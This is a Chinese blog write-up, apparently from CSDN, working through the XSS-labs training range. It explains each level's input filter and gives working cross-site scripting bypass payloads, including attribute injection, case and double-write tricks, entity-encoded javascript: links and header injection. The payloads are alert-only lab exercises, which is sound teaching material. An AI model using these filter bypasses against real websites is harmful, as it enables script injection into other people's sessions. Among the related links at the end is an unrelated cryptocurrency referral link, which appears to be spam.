双层小牛堡

XSS-labs

XSS常见的触发标签_xss标签_H3rmesk1t的博客-CSDN博客

该补习补习xss漏洞了

漏洞原理

网站存在静态和动态网站

xss 针对的网站就是动态网站

动态网站

会根据 用户的环境  与 需求 反馈出 不同的响应


静态页面 

代码写死了  只会存在代码中有的内容

通过动态网站用户体验会大大加深但是会存在漏洞 xss

XSS 是一种注入漏洞

通过用户输入 在代码页中插入 恶意语句 从而实现注入

攻击成功 可以获取但不止 COOKIE 会话 和 隐私页面

首先我们来看看最简单

然后我们通过 get 传递漏洞

xss需要通过php的输出指令来输出

我们通过做题目来继续了解吧

打开靶场

Level1 【无过滤】

我们能发现这三个地方

然后我们回去看看源代码

能发现我们输入什么他就存储在源代码什么

这里就是动态的

如果和sql注入一样我们插入恶意代码呢



这里通过 alert 来弹窗

这里 script 表示 JavaScript代码 / 表示结束了



那么这里插入后

欢迎用户test1


就变为了


欢迎用户test1



实现了 alert 弹窗

我们就实现了第一题

Level2 【参数】

我们依然看看源代码

这里我们发现了我们输入的值被当做参数了

value="1">

这里我们就想到了 sql注入的闭合了

"> 就会实现xss注入

所以payload 就是

">

">  <"

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+ 为 <sricpt>alert()</sricpt></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/f91c5b2805ed434ca32d54826bcfa661.jpg" target="_blank"><img alt="XSS-labs_第7张图片" height="184" src="http://img.e-com-net.com/image/info8/f91c5b2805ed434ca32d54826bcfa661.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p></p> 
  <h2>Level3   【htmlspecialchars】</h2> 
  <p>我们查看代码 没有发现和上一题有什么不一样的</p> 
  <p>所以我们去继续使用上题的payload</p> 
  <pre><code>"><script>alert(1)</script></code></pre> 
  <p> <a href="http://img.e-com-net.com/image/info8/38472eed682542b096488062d0f23e14.jpg" target="_blank"><img alt="XSS-labs_第8张图片" height="122" src="http://img.e-com-net.com/image/info8/38472eed682542b096488062d0f23e14.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现被实体化了</p> 
  <p>并且只过滤了  <></p> 
  <p>这里我们就需要想到是htmlspecialchars</p> 
  <p>我们去看xsslab源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/ea44a4f21ee1422c959a9f1ab416eea8.jpg" target="_blank"><img alt="XSS-labs_第9张图片" height="138" src="http://img.e-com-net.com/image/info8/ea44a4f21ee1422c959a9f1ab416eea8.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>确实是这样</p> 
  <p><a href="http://img.e-com-net.com/image/info8/9e51e959e62648ad82bd36f9a4d2270b.jpg" target="_blank"><img alt="XSS-labs_第10张图片" height="396" src="http://img.e-com-net.com/image/info8/9e51e959e62648ad82bd36f9a4d2270b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>这里其实预定义了转义的内容  因为单引号没有被转义 但是其实可以实现的</p> 
  <pre><code>&：转换为&amp;
"：转换为&quot;
'：转换为成为 '
<：转换为&lt;
>：转换为&gt;
</code></pre> 
  <p>发现就是为了让 <>里面的转变为字符串 失去闭合作用</p> 
  <h3>单引号绕过</h3> 
  <p>这里我们需要通过 ' 绕过</p> 
  <pre><code>因为我们的<> 会被实体化

所以我们需要运用不需要<>的payload

我们可以利用 onfocus 事件
</code></pre> 
  <h3>onfocus事件</h3> 
  <pre><code>当 页面中存在 输入框等 需要存在点击的界面时

onfocus 就可以被触发

</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6336cecbd77c4f529b405841bb36ef5b.jpg" target="_blank"><img alt="XSS-labs_第11张图片" height="157" src="http://img.e-com-net.com/image/info8/6336cecbd77c4f529b405841bb36ef5b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>这里就存在一个很明显的例子</p> 
  <p>既然 onfocus可以出发函数 那么我们就可以通过执行</p> 
  <p>这里就可以写入payload</p> 
  <pre><code>onfocus=javascript:alert()</code></pre> 
  <p>这样就可以绕过 过滤 <></p> 
  <p>那我们如何执行呢</p> 
  <pre><code>我们输入一个 ' 时

变成了下面这个
value="" '="">



我们输入 'abcd'

变为了

value="" abcd''="">


我们输入 payload

' onfocus=javascript:alert(1) ' 

就会变为

value=""  onfocus=javascript:alert(1) '' ="">

从而实现了闭合</code></pre> 
  <p>所以最终payload</p> 
  <pre><code>' onfocus=javascript:alert(1) '</code></pre> 
  <h2>Level4   【过滤><】</h2> 
  <p>我们首先可以判断是否存在过滤</p> 
  <pre><code>'"&<></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d8d3a978174641e98fe77c5e9010e380.jpg" target="_blank"><img alt="XSS-labs_第12张图片" height="116" src="http://img.e-com-net.com/image/info8/d8d3a978174641e98fe77c5e9010e380.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现只有3个了 过滤了 <></p> 
  <p>用上题目的payload</p> 
  <pre><code>' onfocus=javascript:alert(1) '</code></pre> 
  <p>失效了</p> 
  <p>我们看看代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/94ee30b14a594c2b99b347bec981e859.jpg" target="_blank"><img alt="" height="83" src="http://img.e-com-net.com/image/info8/94ee30b14a594c2b99b347bec981e859.jpg" width="569"></a></p> 
  <p>进行修改payload</p> 
  <pre><code>" onfocus=javascript:alert(1) '</code></pre> 
  <h2>Level5   【过滤script】</h2> 
  <p>我们使用第一题的payload直接上去</p> 
  <p><a href="http://img.e-com-net.com/image/info8/b7e9e68a09c34d55acd67189188b62d0.jpg" target="_blank"><img alt="" height="65" src="http://img.e-com-net.com/image/info8/b7e9e68a09c34d55acd67189188b62d0.jpg" width="282"></a></p> 
  <p>发现 script 变为了 scr_ipt</p> 
  <p>我们去看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/a2df0926a3c646f3b7bedb9d66845e7d.jpg" target="_blank"><img alt="XSS-labs_第13张图片" height="161" src="http://img.e-com-net.com/image/info8/a2df0926a3c646f3b7bedb9d66845e7d.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现过滤了 on 和 script</p> 
  <p>所以我们使用其他方式</p> 
  <h3>a herf</h3> 
  <pre><code><html
<p>123</p>
<a href=javascript:alert("yes")>xxxxxx</a>
</html></code></pre> 
  <p>我们先给出payload</p> 
  <p>然后我们解释一下</p> 
  <p><a href="http://img.e-com-net.com/image/info8/3edd6c52305a4df8b6438905044ddaf2.jpg" target="_blank"><img alt="XSS-labs_第14张图片" height="132" src="http://img.e-com-net.com/image/info8/3edd6c52305a4df8b6438905044ddaf2.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>通过 a标签 然后点击 我们可以实现跳转等操作</p> 
  <p>既然可以实现跳转 那我们也可以实现 执行JavaScript命令</p> 
  <p>我们开始做题</p> 
  <p>我们先传入内容</p> 
  <pre><code><a href=javascript:alert()>xxxxxx</a></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/602016a767264a078ce5403fb0189470.jpg" target="_blank"><img alt="" height="69" src="http://img.e-com-net.com/image/info8/602016a767264a078ce5403fb0189470.jpg" width="454"></a></p> 
  <p>我们需要闭合 所以修改paylaod</p> 
  <pre><code>"> <a href=javascript:alert()>xxxxx</a></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d246f7e90bb246afb2a98b489f1fb2f2.jpg" target="_blank"><img alt="XSS-labs_第15张图片" height="103" src="http://img.e-com-net.com/image/info8/d246f7e90bb246afb2a98b489f1fb2f2.jpg" width="358" style="border:1px solid black;"></a></p> 
  <p>还需要将后面的 "> 闭合</p> 
  <p>所以最后的payload为</p> 
  <pre><code>"> <a href=javascript:alert()>xxxxx</a> <"</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/508794bdc4534840b99118d6eac46a42.jpg" target="_blank"><img alt="XSS-labs_第16张图片" height="181" src="http://img.e-com-net.com/image/info8/508794bdc4534840b99118d6eac46a42.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>点击即可实现</p> 
  <h2>Level6   【过滤 a href】</h2> 
  <p>我们把上面的 payload 丢进去看看</p> 
  <p><a href="http://img.e-com-net.com/image/info8/99774aa8574e4d46b8449cc7d6beef8f.jpg" target="_blank"><img alt="" height="77" src="http://img.e-com-net.com/image/info8/99774aa8574e4d46b8449cc7d6beef8f.jpg" width="530"></a></p> 
  <p>发现 过滤 了 a href</p> 
  <p><a href="http://img.e-com-net.com/image/info8/9f0f26a01d754501bb5cb7f7fd0d0442.png" target="_blank"><img alt="XSS-labs_第17张图片" height="200" src="http://img.e-com-net.com/image/info8/9f0f26a01d754501bb5cb7f7fd0d0442.png" width="500" style="border:1px solid black;"></a></p> 
  <p>但是放出来了 大小写 所以我们可以</p> 
  <h3>大小写绕过</h3> 
  <p>"> <ScRipt>alert()</ScRipt> <"</p> 
  <p>或者</p> 
  <p>"> <a HrEf=javascript:alert()>xxxx</a> <"</p> 
  <p>又或者</p> 
  <p>" Onfocus=javascript:alert() "</p> 
  <h2>Level7  【替换为空】</h2> 
  <p>我们先上关键词看看</p> 
  <pre><code>" Onfocus <ScRipt> <a Href=javascript:alert()></code></pre> 
  <p>能发现返回值是</p> 
  <p><a href="http://img.e-com-net.com/image/info8/486dc7e708fd4b57a34c6f80fb07b8de.jpg" target="_blank"><img alt="" height="66" src="http://img.e-com-net.com/image/info8/486dc7e708fd4b57a34c6f80fb07b8de.jpg" width="380"></a></p> 
  <pre><code>" focus <> <a =java:alert()></code></pre> 
  <p>全部替换为空了</p> 
  <p>这里我们使用</p> 
  <h3>双写绕过</h3> 
  <p>开始构造</p> 
  <pre><code>" OOnnfocus=javascscriptript:alert() "

"> <a hrhrefef=javascscriptript:alert()>xx</a> <"</code></pre> 
  <h2>Level8   【a href标签自动url解码】</h2> 
  <p>更新一下 关键词</p> 
  <pre><code>" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()></code></pre> 
  <p>看看过滤了啥</p> 
  <p><a href="http://img.e-com-net.com/image/info8/a710508f5f4d45cbb4fc72d85bbc407a.jpg" target="_blank"><img alt="XSS-labs_第18张图片" height="148" src="http://img.e-com-net.com/image/info8/a710508f5f4d45cbb4fc72d85bbc407a.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/4b6749ba585b4147b1e4fb901fcdd430.png" target="_blank"><img alt="XSS-labs_第19张图片" height="225" src="http://img.e-com-net.com/image/info8/4b6749ba585b4147b1e4fb901fcdd430.png" width="579" style="border:1px solid black;"></a></p> 
  <p>这里为什么我们无法直接通过input来xss 因为存在 htmlspecialchars函数 会吧我们输入的内容</p> 
  <p>直接作为字符串输出</p> 
  <p><a href="http://img.e-com-net.com/image/info8/677adc0da54f4f28981aca0ff4cbf077.jpg" target="_blank"><img alt="XSS-labs_第20张图片" height="109" src="http://img.e-com-net.com/image/info8/677adc0da54f4f28981aca0ff4cbf077.jpg" width="584" style="border:1px solid black;"></a></p> 
  <p>引号被过滤了 无法实现闭合</p> 
  <p></p> 
  <p>所以没有用了</p> 
  <p>我们需要通过下面的 a href标签输出了</p> 
  <p>但是下面又存在过滤</p> 
  <p>我们如何实现呢</p> 
  <p>其实</p> 
  <h4>a href 存在自动解密 url的功能</h4> 
  <p>所以我们只需要通过编码绕过 过滤 如何通过 a href 编码执行即可</p> 
  <pre><code>javascript:alert()


&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;


unicode编码</code></pre> 
  <p>直接输入即可</p> 
  <p>然后点击 友情链接即可</p> 
  <h2>Level9   【判断http在不在标签内】</h2> 
  <p>我们看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/baa19d63c0c84c9c878e01c000bffe14.jpg" target="_blank"><img alt="XSS-labs_第21张图片" height="156" src="http://img.e-com-net.com/image/info8/baa19d63c0c84c9c878e01c000bffe14.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>strpos 查看 http://是否在 输入里面 如果不在 输出不合法</p> 
  <p>这里就好办了</p> 
  <p>我们通过注释输入http://即可</p> 
  <p>运用上一道题目的payload</p> 
  <pre><code>&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41; /* http:// */</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6e1c6a1548b247ee87a18109e835c4a8.jpg" target="_blank"><img alt="XSS-labs_第22张图片" height="136" src="http://img.e-com-net.com/image/info8/6e1c6a1548b247ee87a18109e835c4a8.jpg" width="574" style="border:1px solid black;"></a></p> 
  <p>这里就看到 http:// 是被注释掉了</p> 
  <h2 style="background-color:transparent;">Level10 【闭合 fake hidden】</h2> 
  <p>看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/350b904aa5a84717a68eacc19adbbf53.jpg" target="_blank"><img alt="XSS-labs_第23张图片" height="212" src="http://img.e-com-net.com/image/info8/350b904aa5a84717a68eacc19adbbf53.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现需要另一个来传递</p> 
  <p>我们这里并且过滤了 <></p> 
  <p>但是其实还是很简单的</p> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6c537bbeda4f4747842072783b57eca7.jpg" target="_blank"><img alt="XSS-labs_第24张图片" height="365" src="http://img.e-com-net.com/image/info8/6c537bbeda4f4747842072783b57eca7.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2> Level11  【Referer注入】</h2> 
  <p>我们再来看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/4ec00b5cae824b05a8befd87b28195c6.jpg" target="_blank"><img alt="XSS-labs_第25张图片" height="266" src="http://img.e-com-net.com/image/info8/4ec00b5cae824b05a8befd87b28195c6.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>通过referer</p> 
  <p>为什么无法通过 t_sort</p> 
  <p>因为 htmlspecialchars 无法闭合 " 会被实体化</p> 
  <p>所以我们通过 referer来进行 xss</p> 
  <p>referer 的内容 就和 上面一样</p> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/36627141a66649308f28955d10518690.jpg" target="_blank"><img alt="XSS-labs_第26张图片" height="207" src="http://img.e-com-net.com/image/info8/36627141a66649308f28955d10518690.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/798f24db0b2e49e483059ab23615b36f.jpg" target="_blank"><img alt="XSS-labs_第27张图片" height="412" src="http://img.e-com-net.com/image/info8/798f24db0b2e49e483059ab23615b36f.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2 style="background-color:transparent;">Level12 【UA注入】</h2> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/7b270c86d68543b5992c04257c464c1b.jpg" target="_blank"><img alt="XSS-labs_第28张图片" height="239" src="http://img.e-com-net.com/image/info8/7b270c86d68543b5992c04257c464c1b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/e3beac2944e84fd6a2b1afe4cf77e3d2.jpg" target="_blank"><img alt="XSS-labs_第29张图片" height="409" src="http://img.e-com-net.com/image/info8/e3beac2944e84fd6a2b1afe4cf77e3d2.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level13 【cookie注入】</h2> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/c42c349025ff4912b2641b9c1e1158bd.jpg" target="_blank"><img alt="XSS-labs_第30张图片" height="350" src="http://img.e-com-net.com/image/info8/c42c349025ff4912b2641b9c1e1158bd.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level14  【通过图片属性实现xss】</h2> 
  <p>这里我的小皮环境有问题 无法实现文件上传</p> 
  <p>这里 主要就是通过 图片的属性解析 然后我们写入 xss语句</p> 
  <p>这样就会报错</p> 
  <p>[靶场] XSS-Labs 14-20_3hex的博客-CSDN博客</p> 
  <h2>Level15   【通过src访问文件执行】</h2> 
  <p>这里的意思就是src是访问了 一个图片</p> 
  <p>那我们可以通过这个src访问第一题的php 然后通过 第一题的php来执行</p> 
  <p>但是我还是无法实现 可能我php没开启属性</p> 
  <p>xss-labs靶场实战全通关详细过程（xss靶场详解）-CSDN博客</p> 
  <h2>Level16   【绕过空格】</h2> 
  <p>XSS常见的触发标签_xss标签_H3rmesk1t的博客-CSDN博客</p> 
  <p><a href="http://img.e-com-net.com/image/info8/52cd5b797c2c4575b8ae79fcf11e967c.png" target="_blank"><img alt="XSS-labs_第31张图片" height="189" src="http://img.e-com-net.com/image/info8/52cd5b797c2c4575b8ae79fcf11e967c.png" width="460" style="border:1px solid black;"></a></p> 
  <p>查看代码</p> 
  <p>发现过滤了 空格 和 /</p> 
  <p>首先就是查找一个不需要/的触发标签</p> 
  <p>这里我选择</p> 
  <pre><code class="hljs"><video><source onerror="alert(1)"></code></pre> 
  <p>其次需要绕过空格</p> 
  <p>我们可以首先看看 这两个空格是什么编码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/06be95b52b5244e8b1287ec478b7786d.jpg" target="_blank"><img alt="XSS-labs_第32张图片" height="630" src="http://img.e-com-net.com/image/info8/06be95b52b5244e8b1287ec478b7786d.jpg" width="539" style="border:1px solid black;"></a></p> 
  <p>那么这里面我们可以使用 %0a绕过</p> 
  <p>所以payload就是</p> 
  <pre><code class="hljs"><video><source%0Aonerror="alert(1)"></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/8abec2205a354952b6dbaf6d730973b9.jpg" target="_blank"><img alt="XSS-labs_第33张图片" height="544" src="http://img.e-com-net.com/image/info8/8abec2205a354952b6dbaf6d730973b9.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level17</h2> 
  <p>后面是 flash的插件了</p> 
  <p>我觉得没有必要做了 因为现在 flash已经被大多数浏览器抛弃了</p> 
  <p></p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1708452222792183808"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(WEB,xss,安全,前端)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1899350382295969792.htm"
                           title="Monorepo与pnpm：前端项目管理的完美搭档" target="_blank">Monorepo与pnpm：前端项目管理的完美搭档</a>
                        <span class="text-muted">秋の本名</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/pnpm/1.htm">pnpm</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E6%A1%86%E6%9E%B6/1.htm">前端框架</a><a class="tag" taget="_blank" href="/search/mojo/1.htm">mojo</a>
                        <div>一、什么是pnpmpnpm又称performantnpm，翻译过来就是高性能的npm。1.节省磁盘空间提高安装效率pnpm通过使用硬链接和符号链接（又称软链接）的方式来避免重复安装以及提高安装效率。硬链接：和原文件共用一个磁盘地址，相当于别名的作用，如果更改其中一个内容，另一个也会跟着改变符号链接（软链接）：是一个新的文件，指向原文件路径地址，类似于快捷方式官网原话：当使用npm时，如果你有100</div>
                    </li>
                    <li><a href="/article/1899349626687909888.htm"
                           title="ES6语法详解" target="_blank">ES6语法详解</a>
                        <span class="text-muted">八月五</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/es6/1.htm">es6</a>
                        <div>ES的全称是ECMAScript,它是由ECMA国际标准化组织,制定的一项脚本语言的标准化规范。ES6实际上是一个泛指，泛指ES2015及后续的版本。目录1.let关键字和const关键字let关键字const关键字2.解构赋值数组解构赋值对象解构赋值解构赋值用于传参3.字符串新增特性模板字符串字符串实例新增方法4.数值新增特性新增二进制和八进制表示方法Number构造函数本身新增方法和属性安全整</div>
                    </li>
                    <li><a href="/article/1899343573246078976.htm"
                           title="web前端期末大作业：婚纱网页主题网站设计——唯一旅拍婚纱公司网站HTML+CSS+JavaScript" target="_blank">web前端期末大作业：婚纱网页主题网站设计——唯一旅拍婚纱公司网站HTML+CSS+JavaScript</a>
                        <span class="text-muted">IT-司马青衫</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1/1.htm">课程设计</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a>
                        <div>‍静态网站的编写主要是用HTMLDⅣV+CSSJS等来完成页面的排版设计‍，一般的网页作业需要融入以下知识点：div布局、浮动定位、高级css、表格、表单及验证、js轮播图、音频视频Fash的应用、uli、下拉导航栏、鼠标划过效果等知识点，学生网页作业源码，制作水平和原创度都适合学习或交作业用，记得点赞。精彩专栏推荐【作者主页——获取更多优质源码】【web前端期末大作业——毕设项目精品实战案例(1</div>
                    </li>
                    <li><a href="/article/1899343443029716992.htm"
                           title="在 ASP.NET Core WebAPI 中使用 JWT 验证" target="_blank">在 ASP.NET Core WebAPI 中使用 JWT 验证</a>
                        <span class="text-muted">.NET跨平台</span>
<a class="tag" taget="_blank" href="/search/ASP.NET/1.htm">ASP.NET</a><a class="tag" taget="_blank" href="/search/Core/1.htm">Core</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/API/1.htm">API</a><a class="tag" taget="_blank" href="/search/IdentityServer4/1.htm">IdentityServer4</a><a class="tag" taget="_blank" href="/search/OAuth2.0%E5%8D%8F%E8%AE%AE/1.htm">OAuth2.0协议</a><a class="tag" taget="_blank" href="/search/.NET/1.htm">.NET</a><a class="tag" taget="_blank" href="/search/CORE/1.htm">CORE</a><a class="tag" taget="_blank" href="/search/WEBAPI/1.htm">WEBAPI</a><a class="tag" taget="_blank" href="/search/JWT/1.htm">JWT</a>
                        <div>为了保护WebAPI仅提供合法的使用者存取，有很多机制可以做，透过JWT(JSONWebToken)便是其中一种方式，这篇示范如何使用官方所提供的System.IdentityModel.Tokens.Jwt扩充套件，处理呼叫API的来源是否为合法的使用者身分。顺道一提，要产生JWTToken有很多套件可以帮助开发者快速建立，JWT这个NuGet套件就是其中一个，但这裡我使用官方所提供的Syste</div>
                    </li>
                    <li><a href="/article/1899343446825562112.htm"
                           title="API身份验证使用JWT的.NET实现" target="_blank">API身份验证使用JWT的.NET实现</a>
                        <span class="text-muted">雨夜思绪~静谧思考</span>
<a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a>
                        <div>API身份验证使用JWT的.NET实现在现代的应用程序开发中，API身份验证是一项至关重要的任务。JWT（JSONWebToken）是一种常用的身份验证机制，它使用JSON格式表示身份验证信息，并使用签名进行验证。在.NET平台上，我们可以使用一些库来实现JWT身份验证。本文将介绍如何使用.NET来进行API身份验证并使用JWT作为身份验证机制。引入依赖项首先，我们需要在我们的项目中引入相关的依赖</div>
                    </li>
                    <li><a href="/article/1899341426584514560.htm"
                           title="如何注册下载币安" target="_blank">如何注册下载币安</a>
                        <span class="text-muted">FAC306</span>
<a class="tag" taget="_blank" href="/search/%E5%8C%BA%E5%9D%97%E9%93%BE/1.htm">区块链</a><a class="tag" taget="_blank" href="/search/web3/1.htm">web3</a>
                        <div>安卓注册下载链接如下，苹果下载需要更换IDwww.marketwebb.click/zh-CN/join?ref=TLMVPKLP</div>
                    </li>
                    <li><a href="/article/1899340922013937664.htm"
                           title="笔记:在.Net Core Web Api里使用JWT" target="_blank">笔记:在.Net Core Web Api里使用JWT</a>
                        <span class="text-muted">风中的余烬~</span>
<a class="tag" taget="_blank" href="/search/.netcore/1.htm">.netcore</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                        <div>首先，先建一个JWT配置类//////JWT配置类///publicclassJwtTokenOption{//////Token过期时间，默认为60分钟///publicintTokenExpireTime{get;set;}=60;//////接收人///publicstring?Audience{get;set;}//////秘钥///publicstring?SecurityKey{get</div>
                    </li>
                    <li><a href="/article/1899339285023223808.htm"
                           title="Webpack打包构建流程" target="_blank">Webpack打包构建流程</a>
                        <span class="text-muted">码上跑步</span>
<a class="tag" taget="_blank" href="/search/webpack/1.htm">webpack</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/node.js/1.htm">node.js</a>
                        <div>webpack的打包构建流程为什么需要打包？在前端有非常多的资源，如css、js、vue、vue、图片、字体等。有些资源需要加工处理1.ts->jsts-loader2.css->css-loader+style-loader3.图片->file-loader+url-loader4.html->html-webpack-plugin需要对产物进行优化optimization（webpack优化配</div>
                    </li>
                    <li><a href="/article/1899338906130771968.htm"
                           title="webpack" target="_blank">webpack</a>
                        <span class="text-muted">码上跑步</span>
<a class="tag" taget="_blank" href="/search/webpack/1.htm">webpack</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/node.js/1.htm">node.js</a>
                        <div>webpack介绍webpack是一个构建工具,实现了模块化管理项目.他的工作方式是用各种loader将各种资源转化为js文件或者对js文件进行压缩编译亦或对静态资源进行处理.官网:webpack由来模块化存在一些问题1.ESM的兼容性问题2.模块文件过多,网络请求频繁3.前端的所有资源包括html和css都需要模块化构建工具应运而生,需要一个集编译,模块打包,支持不同的资源的模块打包工具.Web</div>
                    </li>
                    <li><a href="/article/1899337016932364288.htm"
                           title="JWT在.NET8 Webapi中的使用" target="_blank">JWT在.NET8 Webapi中的使用</a>
                        <span class="text-muted">Evan.Pei</span>
<a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a>
                        <div>JWT身份验证在现代Web应用中广泛使用，主要用于安全地传输用户身份信息.1.身份验证(用户登录后，服务器生成一个JWT并返回给客户端。客户端在后续请求中携带该JWT，服务器通过验证JWT来确认用户身份)2.授权(JWT中可以包含用户的角色或权限信息（如role:“admin”）。服务器根据JWT中的信息决定用户是否有权访问特定资源)3.信息交换(JWT可以包含一些非敏感的用户信息（如用户ID、用</div>
                    </li>
                    <li><a href="/article/1899333108369518592.htm"
                           title="前端实现版本更新自动检测✅" target="_blank">前端实现版本更新自动检测✅</a>
                        <span class="text-muted">水煮白菜王</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/Vue/1.htm">Vue</a><a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a>
                        <div>作者简介：水煮白菜王，一位资深前端劝退师文章专栏：前端专栏，记录一下平时在博客写作中，总结出的一些开发技巧和知识归纳总结✍。感谢支持目录一、背景二、实现原理2.1逻辑2.2一些好处三、具体实现3.1工程化封装3.2关键方法解析脚本哈希获取：对比逻辑：四、全部代码4.1vue34.2vue2五、注意事项与常见问题5.1可能出现的问题5.2浏览器兼容方案一、背景在现代Web应用中，部署前端版本更新后及</div>
                    </li>
                    <li><a href="/article/1899333109644587008.htm"
                           title="如何编写POC/EXP" target="_blank">如何编写POC/EXP</a>
                        <span class="text-muted">藤原千花的败北</span>
<a class="tag" taget="_blank" href="/search/web%E6%BC%8F%E6%B4%9E/1.htm">web漏洞</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>文章目录前言一、漏洞验证方式二、POC是什么？三、POC框架四、简单的POC/EXP编写1、POC编写流程2、以sqli-labs第8关为例-POC3、以sqli-labs第8关为例-EXP前言初学安全时，很多概念理解不透彻，被POC/EXP的概念困扰了许久。最近看到许多招聘上都需要熟练编写POC/编写特殊场景的工具脚本等要求，下决心要理解并学会如何写POC。（这里是Web应用类漏洞的POC）看了</div>
                    </li>
                    <li><a href="/article/1899333110311481344.htm"
                           title="什么是XSS" target="_blank">什么是XSS</a>
                        <span class="text-muted">藤原千花的败北</span>
